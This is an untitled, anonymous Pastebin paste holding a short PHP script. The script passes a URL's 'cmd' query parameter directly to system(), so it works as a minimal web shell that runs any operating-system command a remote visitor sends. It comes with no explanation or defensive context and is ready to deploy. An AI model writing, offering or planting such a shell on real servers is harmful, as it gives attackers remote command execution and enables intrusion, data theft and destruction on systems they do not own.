Advertisement
Guest User

Untitled

a guest
Oct 10th, 2019
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.10 KB | None | 0 0
  1. <?php
  2. if(isset($_GET['cmd']))
  3. {
  4. system($_GET['cmd']);
  5. }
  6. else
  7. {
  8. echo "no cmd param";
  9. }
  10. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement